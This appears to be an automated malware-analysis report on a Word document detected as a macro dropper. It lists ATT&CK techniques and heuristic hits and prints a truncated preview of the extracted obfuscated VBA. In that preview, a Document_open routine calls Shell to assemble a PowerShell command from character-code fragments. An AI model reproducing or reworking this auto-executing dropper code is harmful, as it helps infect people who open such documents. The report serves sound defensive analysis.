MALICIOUS
222
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1059 Command and Scripting Interpreter
T1203 Exploitation for Client Execution
The file contains VBA macros, specifically a Document_Open macro that utilizes the Shell() function. This indicates the macro is designed to execute arbitrary commands upon opening the document. The ClamAV heuristic identifies it as a dropper, suggesting its primary purpose is to download and execute a secondary payload. The specific command executed by the Shell() function is obfuscated but appears to be constructing a command to download and run a payload.
Heuristics 6
-
ClamAV: Doc.Dropper.Agent-6599832-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Dropper.Agent-6599832-0
-
VBA macros detected medium 3 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
Shell() call in VBA critical OLE_VBA_SHELLShell() call in VBA
-
Document_Open macro high OLE_VBA_DOCOPENDocument_Open macro
-
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXECCompiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 16951 bytes |
SHA-256: eac41f4cc4d9e012605d34d4d4e08d94193f900ea8023e0281604eb09eb39154 |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "TfzZZrUQj" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Function cURjRawQR() On Error Resume Next TRPUz = PpfZU Riuhw = CDbl(LTlAr) iIzTV = Tan(19149) SJGRX = mujpP nddBb = Tan(5064) cjuLuk = CDbl(SnZSbo * CDbl(zwQCoo + Int(DSMRNm * Rnd(56483)) * TnRjT * Log(37641 * jwCiYr - sridl + Fix(51)))) zwzuN = BWcaYG wKrzYA = CDbl(RZmJV) jBLTpK = Tan(32318) QuQBC = kEfEG wmafIE = Tan(7383) nISAYJ = CDbl(uLNtsO * CDbl(zwIsd + Int(jjEYBN * Rnd(34728)) * VKKbSc * Log(97812 * jLujhW - DBYmtY + Fix(51)))) iXwtlt = cGuPnW BOZUZ = CDbl(bBkrKf) OXAmTu = Tan(45743) Mjoizw = kwAkCZ JTTMi = Tan(42250) oclvRC = CDbl(VkTsq * CDbl(fQmSOz + Int(kOIMQ * Rnd(81250)) * mdZnE * Log(16251 * jXBYd - RqzVp + Fix(51)))) jjjBJY = RhQPpl bMzQl = CDbl(RqATVY) jhTRr = Tan(33706) GAKDcu = Uhwop ZYGAP = Tan(46947) YmXaa = CDbl(kbvUJj * CDbl(VvTRa + Int(OobWm * Rnd(79427)) * zkIZv * Log(51666 * VltKtr - hYLjA + Fix(51)))) cURjRawQR = MlZWrI + VBA.Shell(AGAzqIEmzBI + Chr(SXhvZ + vbKeyP + FzJmOX) + "owers" + UKGjrNj + JNYlM + zRTMoIqFVj + IcHPnuVBzOb + iAJYcm + MEwKWjHwUD, 92063 - 92063) sfnsf = usSbjM HobUth = CDbl(afwtl) jadHJ = Tan(45208) WIodZ = ZKjFq ZpquK = Tan(88223) RntpF = CDbl(qpDtwh * CDbl(zSiQWL + Int(AdMYv * Rnd(45987)) * QJGAKZ * Log(64515 * iqkYQ - iBcLG + Fix(51)))) Cjcqn = CDihZ rvRabF = CDbl(kZqrW) UKaTMq = Tan(32844) ZfDVrr = sCFja iNrqUf = Tan(10348) KuCzPM = CDbl(lpMrIE * CDbl(wALkD + Int(NSzkX * Rnd(76759)) * kAPWA * Log(73466 * JPYVwi - JkSLM + Fix(51)))) End Function Private Sub Document_open() On Error Resume Next lImuz = BfcUGL nwATr = CDbl(sFPFC) AbXJY = Tan(3346) jGRUG = VYDZKb OjvuL = Tan(97828) qZchO = CDbl(hGChJ * CDbl(rPadr + Int(AoVpGk * Rnd(23043)) * uRAzd * Log(45713 * FUbzp - YUPiZI + Fix(51)))) GcIJGO = JkMsr zwIwK = CDbl(udoYC) cFHOWG = Tan(76973) NSGTHI = CSEJb tEQbL = Tan(20755) Wwclv = CDbl(KShSr * CDbl(mOPlrt + Int(OYXqfa * Rnd(84515)) * jdJQw * Log(68418 * FGicb - iLfzPi + Fix(51)))) cURjRawQR jpBcU = UnXoo Locjkl = CDbl(wmsvW) wXbbN = Tan(66262) mWMGw = SXuAXH CErczv = Tan(34733) UYslvJ = CDbl(tBclG * CDbl(fNjSB + Int(pwIjPB * Rnd(20535)) * vuOjp * Log(69754 * wYfqjD - LkubA + Fix(51)))) KqNziN = jknDV dZmTKr = CDbl(FTikOO) cVrDm = Tan(69904) SwkjCH = SEMwCf ZnCfQ = Tan(95675) LTPpzi = CDbl(wLoAo * CDbl(HQZvAH + Int(EZzFw * Rnd(40551)) * FPaZm * Log(16617 * RCbNm - VUlwj + Fix(51)))) End Sub Attribute VB_Name = "vlCjKcriwiiR" Function UKGjrNj() On Error Resume Next VQrKU = CDbl(NJWDX * CDbl(PfbHt + Int(rUSlua * Rnd(86045)) * QJhlTQ * Log(11440 * aihbi - QjOKcK + Fix(51)))) EwZSO = EjWjw kWQSiE = CDbl(bljGE) GMXwoW = Tan(86315) slOzUu = nipjON wvYmw = Tan(3821) XDNnlNOGs = "He" + "LL -JOIn(( 42," + " 102," + " 103" + " ,120" + ",89,10" YCPzi = CDbl(MoJNmS * CDbl(bvHRwE + Int(rrNoI * Rnd(16311)) * isbuI * Log(53339 * hGhMKE - YGdVwa + Fix(51)))) GuoaFl = iSkkT hpboV = CDbl(dvhTi) jEpjW = Tan(19439) PqIQJ = cLHcbW GJwJpf = Tan(88719) FopSIGYKY = "6,46 , 5" + "1 ,46,96,1" + "07 ,121, 35 " + ", 97," + " 108, 10" + "0,107" + " , 1" + "09 , 122 " + ", 46,124, " + "111,96 , 1" Tasdj = CDbl(WfuwEH * CDbl(nKcHvF + Int(ZrtWUi * Rnd(92833)) * ZqMac * Log(5079 * XJKCT - lUDNw + Fix(51)))) YnTztl = nXqJWp cjVJBw = CDbl(GEkdi) ClcVcE = Tan(97174) RPARFX = wEcYJq izBom = Tan(27350) EvjiO = "06 ," + " 97, 99,53 " + ",42,6" + "9," + " 104 , 95,7" + "0, 89 , 72 , " JXjTWv = CDbl(qLmLD * CDbl(IjAHA + Int(mwfws * Rnd(30176)) * HHXaDY * Log(32435 * ozACH - hAbOo + Fix(51)))) mniUmA = sjFvD rCdaq = CDbl(rnzSl) vWfSc = Tan(35411) qnAAVz = PTjTQd RzVjWi = Tan(38319) FTbqOqVhG = "46, 51 ,46 , 9" + "6, 107,121 ,35" + " , 97 ,108,1" + "00 ,107," + "109," + " 12" + "2 ,46 , 93" + ", 119" + " , 125,122, " iNCtS = CDbl(ZZlHa * CDbl(mFHCVO + Int(wWNSKP * Rnd(83044)) * bwVNM * Log(6860 * TViim - LqoJji + Fix(51)))) kmmTnc = mf ... (truncated) |
|||
Open this report in the interactive analyzer, or submit your own file for analysis.